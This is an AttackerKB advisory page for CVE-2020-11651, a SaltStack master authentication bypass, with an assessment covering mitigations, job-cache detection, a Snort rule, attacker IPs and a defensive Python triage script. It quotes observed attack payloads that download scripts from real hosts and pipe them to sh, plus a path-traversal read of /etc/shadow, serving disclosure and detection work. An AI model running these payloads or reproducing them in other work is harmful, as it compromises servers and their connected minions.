CVE-2020-11651
AttackerKB AKB:C964B102-C1A8-42E7-AE93-2D5FCBAD769C
Published: 2020-04-30 (attackerkb.com)

CVSS v3.1: 9.8 High (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
  Attack Vector: Network | Attack Complexity: Low | Privileges Required: None | User Interaction: None | Scope: Unchanged | Confidentiality: High | Integrity: High | Availability: High

CVSS v2: 7.5 High (AV:N/AC:L/Au:N/C:P/I:P/A:P)
  Access Vector: Network | Access Complexity: Low | Authentication: None | Confidentiality: Partial | Integrity: Partial | Availability: Partial

EPSS: 0.975 (High), percentile 100.0%

An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.

Recent assessments:

kevthehermit at May 01, 2020 8:19pm UTC reported:

Overview

For Salt Master before 2019.2.4 and 3000 before 3000.2 there is potential for RCE as root.

If a salt-master has its ZeroMQ ports 4506 exposed to the public it is possible for an unauthenticated user to gain access to the root_key. With access to the root key it is possible to run a wide range of salt commands that include file read, file write and command execution. These commands can be executed on the salt-master and any minion that is connected.

This requires multiple socket requests: one to read the key and then additional requests to create jobs.

Proof Of Concept

This POC was tested on SaltStack 2019.2.0

As of the time of writing this assessment I have been able to create a functional exploit POC. The code can be found here – <https://github.com/kevthehermit/CVE-2020-11651>

The POC (and others that I am sure will appear shortly) has the following functionality:

  • Read the root key

  • Read and Write files on the Salt Master

  • Construct a payload to gain full RCE as root on any connected Minion

This took several hours and is “easy” with the available information and access to a test instance. Details on the discovery process can be found on our blog – <https://immersivelabs.com/2020/05/06/hackers-are-currently-attacking-vulnerable-saltstack-systems/>

Mitigations:

Patch to the latest versions and do not expose these ports to the external network.

Detections

Examine /var/cache/salt/master/jobs/ on the salt master for a listing of all jobs. The return.p file in these dirs will contain a detailed description of the request and the response. This data is serialised.

Immersive Labs have released a basic python script to parse all these job files – <https://immersivelabs.com/2020/05/06/how-to-lock-onto-the-hackers-targeting-saltstack-minions/>

# cat /var/cache/salt/master/jobs/65/6e5fa0837ca5f3d391c4d70d345ee25baed089b970a78a934709e80d083f95/7a5388b6a882_master/return.p
��return��fun�wheel.file_roots.read�jid�20200501195107225222�user�UNKNOWN�fun_args��../../../../etc/shadow��saltenv�base�_stamp�2020-05-01T19:51:07.229260�return��� /srv/salt/../../../../etc/shadow��root:!::0:::::
bin:!::0:::::
daemon:!::0:::::
adm:!::0:::::
lp:!::0:::::
sync:!::0:::::
shutdown:!::0:::::
halt:!::0:::::
mail:!::0:::::
news:!::0:::::
uucp:!::0:::::
operator:!::0:::::
man:!::0:::::
postmaster:!::0:::::
cron:!::0:::::
ftp:!::0:::::
sshd:!::0:::::
at:!::0:::::
squid:!::0:::::
xfs:!::0:::::
games:!::0:::::
postgres:!::0:::::
cyrus:!::0:::::
vpopmail:!::0:::::
ntp:!::0:::::
smmsp:!::0:::::
guest:!::0:::::
nobody:!::0:::::
salt:!:18164:0:99999:7:::

Snort Rule:

alert tcp $EXTERNAL_NET any -> $HOME_NET 4506 (msg:"Salt Stack root_key read attempt"; content:"_prep_auth_info"; sid:1000000; rev:1;)

On the wire it looks a bit like this, so a stronger rule can be created:
b'\x82\xa3enc\xa5clear\xa4load\x81\xa3cmd\xaf_prep_auth_info'

In the wild

The following IPs have been observed sending malicious payloads; other IPs have been seen scanning.

  • 95.181.178.108

  • 89.151.132.112

  • 89.27.255.58

  • 104.244.76.189

  • 95.213.139.92

  • 81.92.218.74

  • 178.44.87.133

Payloads

The following payloads have been observed:

  • (curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh

  • import subprocess;subprocess.call(\"(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh\",shell=True)

  • /bin/sh -c '(wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://94.253.90.22:44444/ || curl -fs --connect-timeout 5 -m10 --retry 3 http://94.253.90.22:44444/)|sh -s -- 94.253.90.22:44445 G9/kjA/vdOSlUG3q+lz6DZwzr0rgiNWRfbb2UZcnYgmUY01gHW5tQrS6SgjiN/6doZfjvmc='

  • (curl -s anagima3.top/sa.sh||wget -q -O- anagima3.top/sa.sh)|sh

  • (curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh

  • (curl -s 176.104.3.35/?6920||wget -q -O- 176.104.3.35/?6920)|sh

  • /bin/sh -c 'wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://217.25.227.174:44444/?i=[redacted_ip]
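
The following is an added example, not kevthehermit's PoC and not the Immersive Labs job-file parser. It serves two points in the assessment above: the wire bytes shown under "Snort Rule" (a structural match on the decoded msgpack request is tighter than a bare `content:"_prep_auth_info"` substring), and the "Detections" note that return.p under /var/cache/salt/master/jobs/ is serialised (msgpack) and needs decoding before it can be searched. Both sides share one minimal msgpack decoder written here. Assumptions: only the msgpack subset Salt job records use is implemented; the layout where a jid directory's `.load.p` carries `fun`/`arg`/`user` at top level is taken from Salt's local_cache returner and is not shown on this page (the page shows only the wheel-job return.p, which nests the detail under `return`); `publish` is used as a benign, legitimately exposed ClearFuncs command; treating every underscore-prefixed `cmd` on the clear channel as hostile is this example's generalisation of the `_prep_auth_info` case; and all sample bytes are constructed inline, not captured from a real master. It also flags the observed curl/wget-pipe-to-sh payloads listed above when they appear as job arguments.

```python
import re

# Minimal msgpack decoder: the subset Salt's job cache files and ZeroMQ request frames
# use (floats, ext types and signed ints beyond fixint are not needed for this purpose).
def _decode(buf, pos):
    b = buf[pos]; pos += 1
    if b <= 0x7F:         return b, pos                        # positive fixint
    if b >= 0xE0:         return b - 0x100, pos                # negative fixint
    if 0x80 <= b <= 0x8F: return _map(buf, pos, b & 0x0F)      # fixmap
    if 0x90 <= b <= 0x9F: return _arr(buf, pos, b & 0x0F)      # fixarray
    if 0xA0 <= b <= 0xBF: return _str(buf, pos, b & 0x1F)      # fixstr
    if b in (0xC0, 0xC2, 0xC3): return {0xC0: None, 0xC2: False, 0xC3: True}[b], pos
    if 0xCC <= b <= 0xCF:                                      # uint8/16/32/64
        w = 1 << (b - 0xCC)
        return int.from_bytes(buf[pos:pos + w], "big"), pos + w
    prefixed = {0xC4: (1, _bin), 0xC5: (2, _bin), 0xD9: (1, _str), 0xDA: (2, _str), 0xDB: (4, _str),
                0xDC: (2, _arr), 0xDD: (4, _arr), 0xDE: (2, _map), 0xDF: (4, _map)}
    if b in prefixed:                                          # length-prefixed bin/str/array/map
        w, fn = prefixed[b]
        return fn(buf, pos + w, int.from_bytes(buf[pos:pos + w], "big"))
    raise ValueError("unsupported msgpack type byte 0x%02x" % b)

def _bin(buf, pos, n): return bytes(buf[pos:pos + n]), pos + n
def _str(buf, pos, n): return buf[pos:pos + n].decode("utf-8", "replace"), pos + n
def _arr(buf, pos, n):
    out = []
    for _ in range(n):
        v, pos = _decode(buf, pos); out.append(v)
    return out, pos
def _map(buf, pos, n):
    out = {}
    for _ in range(n):
        k, pos = _decode(buf, pos); v, pos = _decode(buf, pos); out[k] = v
    return out, pos

def unpack(buf):
    """Decode one msgpack object: a return.p / .load.p file, or one request frame."""
    return _decode(buf, 0)[0]

def pack(obj):
    """Tiny encoder (None/bool/small int/str/short list/dict), used only to build the samples."""
    if obj is None: return b"\xc0"
    if isinstance(obj, bool): return b"\xc3" if obj else b"\xc2"   # before int: bool subclasses int
    if isinstance(obj, int) and 0 <= obj < 128: return bytes([obj])
    if isinstance(obj, str):
        raw = obj.encode("utf-8")
        return (bytes([0xA0 | len(raw)]) if len(raw) < 32 else b"\xd9" + bytes([len(raw)])) + raw
    if isinstance(obj, list): return bytes([0x90 | len(obj)]) + b"".join(map(pack, obj))
    if isinstance(obj, dict): return bytes([0x80 | len(obj)]) + b"".join(pack(k) + pack(v) for k, v in obj.items())
    raise TypeError(type(obj))

# 1. Wire side: structural match for the clear-channel request that reads the root key.
def clear_channel_private_cmd(frame):
    """Return the cmd if `frame` is an unencrypted ("clear") request calling an underscore-prefixed
    ClearFuncs method, else None.  Flagging every "_"-prefixed cmd (not just _prep_auth_info) is
    this example's generalisation: those helpers are internal and should never arrive over the wire."""
    try:
        msg = unpack(frame)
    except (ValueError, IndexError):       # truncated or non-msgpack data
        return None
    if not isinstance(msg, dict) or msg.get("enc") != "clear":
        return None
    load = msg.get("load")
    cmd = load.get("cmd") if isinstance(load, dict) else None
    return cmd if isinstance(cmd, str) and cmd.startswith("_") else None

# 2. Master side: triage of decoded job-cache records.
PIPE_TO_SH = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b")

def triage_job(rec):
    """Indicator strings for one decoded job record.  A wheel-job return.p nests the detail under
    "return"; a .load.p carries fun/arg/user at top level (assumption from Salt's local_cache returner)."""
    job = rec["return"] if isinstance(rec.get("return"), dict) and "fun" in rec["return"] else rec
    fun = str(job.get("fun", ""))
    args = [str(a) for a in (job.get("fun_args") or job.get("arg") or [])]
    hits = []
    if job.get("user") == "UNKNOWN":
        hits.append("user=UNKNOWN: no authenticated caller recorded")
    if fun.startswith("wheel.file_roots.") and any("../" in a for a in args):
        hits.append("%s with path traversal %s" % (fun, args))
    if fun.startswith("wheel.file_roots.write"):
        hits.append("file write on the master via %s" % fun)
    if any(PIPE_TO_SH.search(a) for a in args):
        hits.append("download-and-pipe-to-shell payload in args of %s" % fun)
    return hits

# Constructed samples (built here with pack(), not captured from a real master).
WIRE_ROOTKEY = b'\x82\xa3enc\xa5clear\xa4load\x81\xa3cmd\xaf_prep_auth_info'  # bytes quoted in the post
WIRE_BENIGN = pack({"enc": "clear", "load": {"cmd": "publish"}})              # publish: a public ClearFuncs method
JOB_SHADOW_READ = pack({"return": {                                           # mirrors the return.p shown above
    "fun": "wheel.file_roots.read", "jid": "20200501195107225222", "user": "UNKNOWN",
    "fun_args": ["../../../../etc/shadow"], "saltenv": "base", "_stamp": "2020-05-01T19:51:07.229260",
    "return": {"/srv/salt/../../../../etc/shadow": "root:!::0:::::\nsalt:!:18164:0:99999:7:::\n"}}})
JOB_MINION_PAYLOAD = pack({"fun": "cmd.run", "jid": "20200501200000000000", "user": "root", "tgt": "*",
                           "arg": ["(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh"]})
JOB_BENIGN = pack({"fun": "test.ping", "jid": "20200501200100000000", "user": "root", "tgt": "*", "arg": []})

if __name__ == "__main__":
    print(clear_channel_private_cmd(WIRE_ROOTKEY), [triage_job(unpack(b)) for b in (JOB_SHADOW_READ, JOB_MINION_PAYLOAD, JOB_BENIGN)])
```

To use this against a real master, walk /var/cache/salt/master/jobs/ and feed each return.p and .load.p to `unpack()` then `triage_job()`; a job with `user=UNKNOWN` or a `wheel.file_roots.*` call carrying `../` is the same pattern as the shadow read captured above. Keying the network rule on the decoded `enc`/`cmd` fields rather than the bare string keeps it from firing on, for example, the same bytes inside an unrelated payload.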

hrbrmstr at May 04, 2020 10:40am UTC reported:

z0r1nga at April 30, 2020 11:57pm UTC reported:

wvu-r7 at May 04, 2020 7:36am UTC reported:

Assessed Attacker Value: 5
Assessed Attacker Value: 5
Assessed Attacker Value: 4
